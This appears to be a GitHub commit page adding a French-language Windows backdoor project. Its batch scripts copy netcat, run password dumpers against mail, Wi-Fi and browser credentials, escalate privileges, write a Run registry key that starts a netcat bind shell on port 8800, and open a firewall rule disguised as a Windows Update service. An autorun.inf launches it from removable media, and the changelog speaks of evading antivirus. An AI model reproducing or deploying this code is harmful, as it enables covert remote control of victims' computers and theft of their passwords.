Skip to content

Commit

Permalink
Initial GIthub port
Browse files Browse the repository at this point in the history
[V0.09]
Initial port to github.
  • Loading branch information
MiRw3b authored Feb 24, 2021
1 parent 9175a23 commit 665b6a1
Show file tree
Hide file tree
Showing 13 changed files with 93 additions and 0 deletions.
16 changes: 16 additions & 0 deletions Back.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
@echo off
color 2
cls
echo Installation de la Backdoor en cours...
xcopy \prive\r\nc.exe "%appdata%" /Y
ipconfig/flushdns
ipconfig>\prive\r\PWD\ConfIp.txt
systeminfo>\prive\r\PWD\SysInfos.txt
cls
start \prive\r\for.bat
start \prive\r\phazess\mailpv.exe /shtml \prive\r\PWD\mailpv.html
start \prive\r\phazess\mspass.exe /shtml \prive\r\PWD\mspass.html
start \prive\r\phazess\netpass.exe /shtml \prive\r\PWD\netpass.html
start \prive\r\phazess\WirelessKeyView.exe /shtml \prive\r\PWD\WirelessKeyView.html
start \prive\r\phazess\WebBrowserPassView.exe /shtml \prive\r\PWD\WebBrowserPassView.html
exit
31 changes: 31 additions & 0 deletions Changelog.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
[2020]
--v0.01: Création Du Project (ça buggait beaucoup xd)/09 Mars
--v0.02: Ajout de loggers qui prennent les mot de passe et divers fixes/09 Mars
--v0.03: autre fixes/10 Mars
--v0.04: ajout d'une commmande permission (en gros sa marche plus facilement)/10 Mars
--v0.05: fix d'un bug & ajout d'un autorun (a tester car apparament les autorun = mort...)10-11 Mars ?
______________________________________________________________________________________________________________________
--------------------------------------------Le projet Reprends--------------------------------------------------------
--v0.06: Fix du choppeur de mot de passe qui buggait + ajout de dossiers en + pour masquer les fichier - 2 octobre
--v0.07: réduction du nombre de .bat & optimisations du code - 3 octobre
--v0.08: ajout d'un script pour bypass le pare-feu + ajout d'un choppeur d'info système & autre optimisation, ajout d'un icon, modif de l'autorun - 4 octobre
--v0.09: mise a jour des grabber de mot de passe & amélioration (plus besoin de redémarrer le pc), encore - de .bat - 6 octobre
----------------------------------------------------------------------------------------------------------------------
______________________________________________________________________________________________________________________
------[Projects a rajouter pour la backdoor]------
-Pouvoir backdoorer n'importe quel PC avec la vraie IP, car pour l'instant sa utilise l'ip LOCALE
(faut que sa soit un pc qui soit connecté au même réseau que toi pour l'instant)
-Un localhost pour pouvoir gérer les pc a distance (en gros comme un RAT mais en mieux et moins détéctable)
_______________________________________________________________________________________________________________________
--------------------[Choses a faire]-----------------------------------------------------------------------------------
Rendre indétectable la backdoor car les antivirus l'ont déja cramé, rip netcat ptdr (oui)
-----------------------------------------------------------------------------------------------------------------------
_______________________________________________________________________________________________________________________
-------------------------------------[Infos Prochaines Mises A Jour]---------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
Peut-être que je rajouterais des virus ou autres, je verrais bien plus tard
-----------------------------------------------------------------------------------------------------------------------
_______________________________________________________________________________________________________________________
-----------------------------------------------------------------------------------------------------------------------
|..................................©MiR, BAckd00r Project - 2020 - discord.gg/R3xDYcM.................................|
-----------------------------------------------------------------------------------------------------------------------
13 changes: 13 additions & 0 deletions Utilisation.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
1.Lancer Back.bat et laisser faire
2.Sur votre autre pc ou téléphone, ouvrir une invite de commande OU termux sur android
3.Marquer telnet IPLOCALE 8800
(en gros remplacez IPLOCALE par l'ip locale du pc,
allez voir dans le dossier prive il y a un fichier texte ConfIp.txt qui a toute les infos ipconfig)
par contre, si vous relancez le fichier back.bat sur un autre pc, les anciennes infos seront supprimés
(mots de passe DUMP et infos d'IPCONFIG)
pour tester, vous pouvez donc faire la commande "dir" sur votre invite de commande pour voir tout les fichier du pc infecté

[Vous pouvez mettre ce fichier texte et Changelog.txt autre pars, genre dans "trucs inutile et privé" (juste après le dossier privé)
----------------------------------------------------
|©MiR, BAckd00r Project - 2020 - discord.gg/R3xDYcM|
----------------------------------------------------
8 changes: 8 additions & 0 deletions autorun.inf
Original file line number Diff line number Diff line change
@@ -0,0 +1,8 @@
[autorun]
open=Back.bat
label=Bckdr
icon=\prive\r\yeah.ico
shell=start
shellstartcommand=Back.bat
shellstart=Install Bckdr Project
UseAutoPlay=1
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
tu met ici les mot de passe et ip locale des gens
et autres info
23 changes: 23 additions & 0 deletions prive/r/for.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
@echo off
color 2
echo Permissions Administrateur en cours d'obtention...
if not "%1"=="am_admin" (powershell start -verb runas '%0' am_admin & exit)
cls
echo Permissions Administrateur obtenues!
echo>nul
echo Finalisation de l'installation de la B4CKD00R en cours....
xcopy "%appdata%\nc.exe" "%SYSTEMROOT%\System32" /Y
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SysStart32" /t "REG_SZ" /d "%SYSTEMROOT%\System32\nc.exe -d -L -e cmd.exe -p 8800" /f
cls
set PORT=8800
set RULE_NAME="Winbck (Windows Update Service)"
netsh advfirewall firewall show rule name=%RULE_NAME% >nul
echo Bypass Du Pare-Feu en cours...
netsh advfirewall firewall add rule name=%RULE_NAME% dir=in action=allow protocol=TCP localport=%PORT%
nc -d -t -e cmd.exe -p 8800
cls
echo Pare-Feu bypassed. La B4CKD00R est maintenant installee.
echo Go Foutre Le Bordel :3
echo ©MiR, BAckd00r Project - 2020 - discord.gg/R3xDYcM
ping 0.0.0.0 -n 2 >nul
exit
Binary file added prive/r/nc.exe
Binary file not shown.
Binary file added prive/r/phazess/WebBrowserPassView.exe
Binary file not shown.
Binary file added prive/r/phazess/WirelessKeyView.exe
Binary file not shown.
Binary file added prive/r/phazess/mailpv.exe
Binary file not shown.
Binary file added prive/r/phazess/mspass.exe
Binary file not shown.
Binary file added prive/r/phazess/netpass.exe
Binary file not shown.
Binary file added prive/r/yeah.ico
Binary file not shown.

0 comments on commit 665b6a1

Please sign in to comment.